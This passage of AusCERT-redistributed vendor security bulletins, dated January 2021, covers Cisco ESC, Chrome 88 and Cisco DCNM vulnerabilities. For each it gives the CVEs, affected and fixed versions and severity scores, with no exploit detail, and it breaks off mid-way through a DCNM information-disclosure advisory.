See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-wsa-sma-info-RHp44vAC
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAka9+NLKJtyKPYoAQh5gg//SG3qLTcagdxpSQ8AlgnKo974Yi8avvkP
tJcHzxqA+NkgXTbY4ughYLJ+oGtkntNDM0MEu0lSI57EuADG0s6JCVYlcKA/qz2x
iHmOFd6LB33SutFkQscJKh91YStVCnTtLXL2g+/Fo/KbgR+PI+8XV77E1FpE9pu7
eOiPW/vF7+w0DZOdbphuKZVL3D+A8yWMUGQfHhBTUKxFJIrrFOVCKv78ibt/DkYJ
FOdcdetdzH/U1NoZMDuDEq83DxAqA8fE+zRh3ZJ1E+PgKxX940kJ4S9HDvDbhy8D
NfbwV/HPma9yM0/F74wK/W6LOsNauhcBdhS5hlypwD8ehLxIy+ZMisQgAJmK2FtY
an/MC7RvwFzBUY+Qou3RBwQXDxVfT9wkp6y5t2+zxUToaAaWEMIHHMunZJwt2ZW9
sAPAzSa1LiGpOMNf7tfryGMVIh+MYgOdsgmkjsH4G52ORo7fAfo3ljwYPGmw3lpp
+VBTf8DXIm50yS/Pjyk5/hEAuY1QIMzujZW2whOhRBMEBtzZCrgatSHluhUg1yYz
iz99iUtoJoPM4ZymqKJOrRgE5Bum7EMITnkTXyLnm5FEhhN/mo1ueLIQYK5Wxb4m
KSSK5BuDyErazGQYVKMM2Mcty44ts7ejwVzRZ/273BFftVmwSiby+QnqDf6enHgc
z0Tal6ZgcRY=
=aivf
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0248
Cisco Elastic Services Controller Denial of Service Vulnerability
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Elastic Services Controller
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1312
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esc-dos-4Gw6D527
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Elastic Services Controller Denial of Service Vulnerability
Priority: Medium
Advisory ID: cisco-sa-esc-dos-4Gw6D527
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv69484
CVE Names: CVE-2021-1312
CWEs: CWE-400
Summary
o A vulnerability in the system resource management of Cisco Elastic Services
Controller (ESC) could allow an unauthenticated, remote attacker to cause a
denial of service (DoS) to the health monitor API on an affected device.
The vulnerability is due to inadequate provisioning of kernel parameters
for the maximum number of TCP connections and SYN backlog. An attacker
could exploit this vulnerability by sending a flood of crafted TCP packets
to an affected device. A successful exploit could allow the attacker to
block TCP listening ports that are used by the health monitor API. This
vulnerability only affects customers who use the health monitor API.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esc-dos-4Gw6D527
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco ESC releases
5.3.0.94 and earlier.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco ESC releases 5.3.0.102 and later
contained the fix for this vulnerability.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esc-dos-4Gw6D527
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkaDeNLKJtyKPYoAQhgew/6AyMzwGdEcWmz4D4uyCvPbSlpCVpd7K+T
vE3o4sj3hA8G0ChswDV+LieHyMaMMmfDyoNGml53mh4LVz/hTb4p5xmwW5XvJa65
CetuYvgnItSewWCk6CwkzNAFDJeGBaEDc9dJWgUH7utv7mCerBFhXlofCRmbqEVQ
aX4GNqmXPguiXt3fgI1mUGfRpEUkyoPxN0FShN0Hd3qGTaBoAEiTQC5svgm2WqQ7
qRHiBRSx/KPbl2h4QCHx88dLUM4RwWJL91IpTOH6LuH1xUizTbIH6PqB79gKs8TT
8m1xhr6tovD5JCs0wctBODmb78gnmAcvqgW9mn7m+oca4dqIMWoObUcImRkoXUNj
Lh8NAsR64TeRmHDwttC8EGPWLOncwDqUmOaYA/VU25sXW+T9Go1cr77t1BNjSyqR
ukK6cIUUT6acPizFcU8WA9eNl/xAFWpjCvD5gcFsnQKBV6ac9B+SFQwKKJrhxEY4
YoTu3UtjEbMWOhNSR/P1zd8xmVLR/Zyy1DMiXD+zzPMZY4oeUVvmdFM9uKOQ+s27
af6mcoJfJkctJve+KP7oLV3iWPtqOqwPPtpWJd7DOM/c+QsGMxP31C/awTGoDApJ
cS7Ceq7pFYpkmVogzUmDIlmKysSa91ngnBZsjNgGGZBC5BVDC/YviYXUngCYQdzE
LOBJQYEaxyE=
=c/7l
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0247
Stable Channel Update for Desktop
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Google Chrome
Publisher: Google
Operating System: Windows
UNIX variants (UNIX, Linux, OSX)
Impact/Access: Execute Arbitrary Code/Commands -- Remote with User Interaction
Denial of Service -- Remote with User Interaction
Access Confidential Data -- Remote with User Interaction
Unauthorised Access -- Remote with User Interaction
Reduced Security -- Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2021-21141 CVE-2021-21140 CVE-2021-21139
CVE-2021-21138 CVE-2021-21137 CVE-2021-21136
CVE-2021-21135 CVE-2021-21134 CVE-2021-21133
CVE-2021-21132 CVE-2021-21131 CVE-2021-21130
CVE-2021-21129 CVE-2021-21128 CVE-2021-21127
CVE-2021-21126 CVE-2021-21125 CVE-2021-21124
CVE-2021-21123 CVE-2021-21122 CVE-2021-21121
CVE-2021-21120 CVE-2021-21119 CVE-2021-21118
CVE-2021-21117 CVE-2020-16044
Reference: ESB-2021.0242
ESB-2021.0209
ESB-2021.0201
ESB-2021.0128
ESB-2021.0093
ESB-2021.0081
Original Bulletin:
https://chromereleases.googleblog.com/2021/01/stable-channel-update-for-desktop_19.html
- --------------------------BEGIN INCLUDED TEXT--------------------
Stable Channel Update for Desktop
Tuesday, January 19, 2021
The Chrome team is delighted to announce the promotion of Chrome 88 to the
stable channel for Windows, Mac and Linux. This will roll out over the coming
days/weeks.
Chrome 88.0.4324.96 contains a number of fixes and improvements -- a list of
changes is available in the log. Watch out for upcoming Chrome and Chromium
blog posts about new features and big efforts delivered in 88
Security Fixes and Rewards
Note: Access to bug details and links may be kept restricted until a majority
of users are updated with a fix. We will also retain restrictions if the bug
exists in a third party library that other projects similarly depend on, but
haven't yet fixed.
This update includes 36 security fixes. Below, we highlight fixes that were
contributed by external researchers. Please see the Chrome Security Page for
more information.
[$30000][1137179] Critical CVE-2021-21117: Insufficient policy enforcement in
Cryptohome. Reported by Rory McNamara on 2020-10-10
[$16000][1161357] High CVE-2021-21118: Insufficient data validation in V8.
Reported by Tyler Nighswander (@tylerni7) of Theori on 2020-12-23
[$5000][1160534] High CVE-2021-21119: Use after free in Media. Reported by
Anonymous on 2020-12-20
[$5000][1160602] High CVE-2021-21120: Use after free in WebSQL. Reported by Nan
Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2020-12-21
[$5000][1161143] High CVE-2021-21121: Use after free in Omnibox. Reported by
Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22
[$5000][1162131] High CVE-2021-21122: Use after free in Blink. Reported by
Renata Hodovan on 2020-12-28
[$1000][1137247] High CVE-2021-21123: Insufficient data validation in File
System API. Reported by Maciej Pulikowski on 2020-10-11
[$N/A][1131346] High CVE-2021-21124: Potential user after free in Speech
Recognizer. Reported by Chaoyang Ding(@V4kst1z) from Codesafe Team of Legendsec
at Qi'anxin Group on 2020-09-23
[$N/A][1152327] High CVE-2021-21125: Insufficient policy enforcement in File
System API. Reported by Ron Masas (Imperva) on 2020-11-24
[$N/A][1163228] High CVE-2020-16044: Use after free in WebRTC. Reported by Ned
Williamson of Project Zero on 2021-01-05
[$3000][1108126] Medium CVE-2021-21126: Insufficient policy enforcement in
extensions. Reported by David Erceg on 2020-07-22
[$3000][1115590] Medium CVE-2021-21127: Insufficient policy enforcement in
extensions. Reported by Jasminder Pal Singh, Web Services Point WSP, Kotkapura
on 2020-08-12
[$2000][1138877] Medium CVE-2021-21128: Heap buffer overflow in Blink. Reported
by Liang Dong on 2020-10-15
[$1000][1140403] Medium CVE-2021-21129: Insufficient policy enforcement in File
System API. Reported by Maciej Pulikowski on 2020-10-20
[$1000][1140410] Medium CVE-2021-21130: Insufficient policy enforcement in File
System API. Reported by Maciej Pulikowski on 2020-10-20
[$1000][1140417] Medium CVE-2021-21131: Insufficient policy enforcement in File
System API. Reported by Maciej Pulikowski on 2020-10-20
[$TBD][1128206] Medium CVE-2021-21132: Inappropriate implementation in
DevTools. Reported by David Erceg on 2020-09-15
[$TBD][1157743] Medium CVE-2021-21133: Insufficient policy enforcement in
Downloads. Reported by wester0x01(https://twitter.com/wester0x01) on 2020-12-11
[$TBD][1157800] Medium CVE-2021-21134: Incorrect security UI in Page Info.
Reported by wester0x01(https://twitter.com/wester0x01) on 2020-12-11
[$TBD][1157818] Medium CVE-2021-21135: Inappropriate implementation in
Performance API. Reported by ndevtk on 2020-12-11
[$2000][1038002] Low CVE-2021-21136: Insufficient policy enforcement in
WebView. Reported by Shiv Sahni, Movnavinothan V and Imdad Mohammed on
2019-12-27
[$500][1093791] Low CVE-2021-21137: Inappropriate implementation in DevTools.
Reported by bobblybear on 2020-06-11
[$500][1122487] Low CVE-2021-21138: Use after free in DevTools. Reported by
Weipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi'anxin Group on
2020-08-27
[$N/A][937131] Low CVE-2021-21139: Inappropriate implementation in iframe
sandbox. Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on
2019-03-01
[$N/A][1136327] Low CVE-2021-21140: Uninitialized Use in USB. Reported by David
Manouchehri on 2020-10-08
[$N/A][1140435] Low CVE-2021-21141: Insufficient policy enforcement in File
System API. Reported by Maciej Pulikowski on 2020-10-20
We would also like to thank all security researchers that worked with us during
the development cycle to prevent security bugs from ever reaching the stable
channel.As usual, our ongoing internal security work was responsible for a wide
range of fixes:
o [1168217] Various fixes from internal audits, fuzzing and other initiatives
Many of our security bugs are detected using AddressSanitizer, MemorySanitizer,
UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL.
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkYAeNLKJtyKPYoAQj4GA/+LsTvtvD3JncNDyJh40fpYCanvX8DSRyE
Y9PhNCnOFfjRIsmaFnFSMnB+9Bs/JvHjDL43RqdJAVOCyxO7bsYPnlgpGUrTu3Sd
gs1hls1ATP43Xx/wvqzwgoqKPBxSIJTe+cK7O8f48rnbT88MGH/wXqFpcs2SLRvL
0zgq4UsgKDV0dWbQ8C4OlZEhUa+sskgC6CIs50mRZ3vDU4NI/B2iPA1HBlNslh+3
wToXGx6dCglanPIL36ZW/aj1SLPT4I4nckQEOOl5puAMZEbnGdBMLQaPx59BcQyA
asiiIJoQ/HswjH82RDHDVQkVzCWVWFdtp4VeN9BsHbL+TK0qKdownqHMfoGE/Ofv
uZUT1VQmwmRnDRweY78W3Cg3lpRFHKMvMiHAxPOXD/pLZfeLo+Z0jAccEbiWw+I3
tWsubUeytKpcSASDLVGT2VmWFCPKVVR94ASpWpIeIYS+fDmLv6biRuni4y+M6VuU
WXx5b7tRo/hxqKukP/1ASn2DUko6QEa7Dv1MGAQWmT9PTJAnGH9IkFbByByp+Zpz
Nk3/uf1OUYXzZG6fhiwy9GHuZxN15D9NyM5kwh8bCa3KfXnFWb11eP9hCHabftB6
yytl6sd3hDOPDODC3q/PxxMoVoF4j6vqBWxnotm1J5F9ydefmm2hZ3gedAeitGN9
oFBqjpGE0iY=
=oPvY
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0246
Cisco Data Center Network Manager multiple vulnerabilities
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco Data Center Network Manager
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Execute Arbitrary Code/Commands -- Remote with User Interaction
Modify Arbitrary Files -- Existing Account
Delete Arbitrary Files -- Existing Account
Cross-site Scripting -- Remote with User Interaction
Access Confidential Data -- Remote/Unauthenticated
Reduced Security -- Remote/Unauthenticated
Unauthorised Access -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1286 CVE-2021-1283 CVE-2021-1277
CVE-2021-1276 CVE-2021-1272 CVE-2021-1270
CVE-2021-1269 CVE-2021-1255 CVE-2021-1253
CVE-2021-1250 CVE-2021-1249 CVE-2021-1248
CVE-2021-1247 CVE-2021-1135 CVE-2021-1133
CVE-2020-1276
Reference: ASB-2020.0107
ESB-2020.3874
ESB-2020.3402
ESB-2020.3063
ESB-2020.2532
ESB-2020.2009.3
ESB-2020.1899
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-authbypass-OHBPbxu
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-info-disc-QCSJB6YG
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-api-path-TpTApx2p
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-sql-inj-OAQOObP
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-ssrf-F2vX6q5p
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-xss-vulns-GuUJ39gh
Comment: This bulletin contains seven (7) Cisco Systems security advisories.
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco Data Center Network Manager Authorization Bypass Vulnerabilities
Priority: Medium
Advisory ID: cisco-sa-dcnm-authbypass-OHBPbxu
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvu57868 CSCvv87627
CVE Names: CVE-2021-1269 CVE-2021-1270
Summary
o Multiple vulnerabilities in the web-based management interface of Cisco
Data Center Network Manager (DCNM) could allow an authenticated, remote
attacker to view, modify, and delete data without proper authorization.
For more information about these vulnerabilities, see the Details section
of this advisory.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-authbypass-OHBPbxu
Affected Products
o Vulnerable Products
At the time of publication, these vulnerabilities affected Cisco DCNM
releases earlier than Release 11.5(1).
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by these vulnerabilities.
Details
o The vulnerabilities are not dependent on one another; exploitation of one
of the vulnerabilities is not required to exploit the other vulnerability.
In addition, a software release that is affected by one of the
vulnerabilities may not be affected by the other vulnerability.
Details about the vulnerabilities are as follows:
CVE-2021-1270: Cisco DCNM Authorization Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco DCNM could
allow an authenticated, remote attacker to modify the configuration without
proper authorization.
This vulnerability is due to a failure to limit access to resources that
are intended for users with Administrator privileges. An attacker could
exploit this vulnerability by sending a crafted HTTP request to an affected
device. A successful exploit could allow a low-privileged attacker to edit
the configuration. To exploit this vulnerability, an attacker would need
valid nonadministrative credentials.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvv87627
CVE-ID: CVE-2021-1270
Security Impact Rating (SIR): Medium
CVSS Base Score: 7.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
CVE-2021-1269: Cisco DCNM Authorization Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco DCNM could
allow an authenticated, remote attacker to bypass authorization on an
affected device and access sensitive information that is related to the
device.
This vulnerability is due to a failure to limit access to resources that
are intended for users with Administrator privileges. An attacker could
exploit this vulnerability by sending a crafted HTTP request to an affected
device. A successful exploit could allow a low-privileged attacker to list,
view, create, edit, and delete specific system configurations in the same
manner as a user with Administrator privileges.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvu57868
CVE-ID: CVE-2021-1269
Security Impact Rating (SIR): Medium
CVSS Base Score: 6.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco DCNM releases 11.5(1) and later contained
the fix for these vulnerabilities.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o These vulnerabilities were found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-authbypass-OHBPbxu
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco Data Center Network Manager Certificate Validation Vulnerabilities
Priority: High
Advisory ID: cisco-sa-dcnm-cert-check-BdZZV9T3
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv35346 CSCvv35348 CSCvv35354 CSCvv82441
CVE Names: CVE-2021-1276 CVE-2021-1277
CWEs: CWE-295
Summary
o Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) could
allow an attacker to spoof a trusted host or construct a man-in-the-middle
attack to extract sensitive information or alter certain API requests.
These vulnerabilities are due to insufficient certificate validation when
establishing HTTPS requests with the affected device.
For more information about these vulnerabilities, see the Details section
of this advisory.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3
Affected Products
o Vulnerable Products
These vulnerabilities affect Cisco Data Center Network Manager releases
earlier than 11.5(1).
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by these vulnerabilities.
Details
o The vulnerabilities are not dependent on one another; exploitation of one
of the vulnerabilities is not required to exploit the other vulnerability.
In addition, a software release that is affected by one of the
vulnerabilities may not be affected by the other vulnerability.
Details about the vulnerabilities are as follows:
CVE-2020-1276: Cisco Data Center Network Manager Certificate Validation
Vulnerability
A vulnerability in the Device Manager application of Cisco DCNM could allow
an unauthenticated, remote attacker to modify a specific API request that
is used to verify a user's authentication token.
This vulnerability is due to a lack of validation of the SSL certificate
used when establishing a connection to the Device Manager application. An
attacker could exploit this vulnerability by sending a crafted HTTP request
to an affected device. A successful exploit could allow the attacker to
alter a specific API request.
Bug ID(s): CSCvv82441
CVE ID: CVE-2021-1276
Security Impact Rating (SIR): High
CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
CVE-2021-1277: Cisco Data Center Network Manager Certificate Validation
Vulnerability
A vulnerability in Cisco DCNM could allow an unauthenticated, remote
attacker to spoof a trusted host or construct a man-in-the-middle attack to
extract sensitive information from the affected device.
This vulnerability is due to a lack of certificate validation. An attacker
could exploit this vulnerability by using a crafted X.509 certificate and
could then intercept communications. A successful exploit could allow the
attacker to view and alter potentially sensitive information that DCNM
maintains about clients that are connected to the network.
Bug ID(s): CSCvv35348 , CSCvv35346 , CSCvv35354
CVE ID: CVE-2021-1277
Security Impact Rating (SIR): Medium
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o Cisco has released free software updates that address the vulnerabilities
described in this advisory. Customers may only install and expect support
for software versions and feature sets for which they have purchased a
license. By installing, downloading, accessing, or otherwise using such
software upgrades, customers agree to follow the terms of the Cisco
software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.
When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
/en/us/support/web/tsd-cisco-worldwide-contacts.html
Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.
Fixed Releases
Cisco fixed these vulnerabilities in Cisco DCNM releases 11.5(1) and later.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o These vulnerabilities were found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco Data Center Network Manager Information Disclosure Vulnerability
Priority: Medium
Advisory ID: cisco-sa-dcnm-info-disc-QCSJB6YG
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv07941 CSCvv07942 CSCvv07945 CSCvv07947
CVE Names: CVE-2021-1283
CWEs: CWE-789
Summary
o A vulnerability in the logging subsystem of Cisco Data Center Network
Manager (DCNM) could allow an authenticated, local attacker to view
sensitive information in a system log file that should be restricted.
The vulnerability exists because sensitive information is not properly
masked before it is written to system log files. An attacker could exploit
this vulnerability by authenticating to an affected device and inspecting a
specific system log file. A successful exploit could allow the attacker to
view sensitive information in the system log file. To exploit this
vulnerability, the attacker would need to have valid user credentials.
Cisco has released software updates that address this vulnerability. There
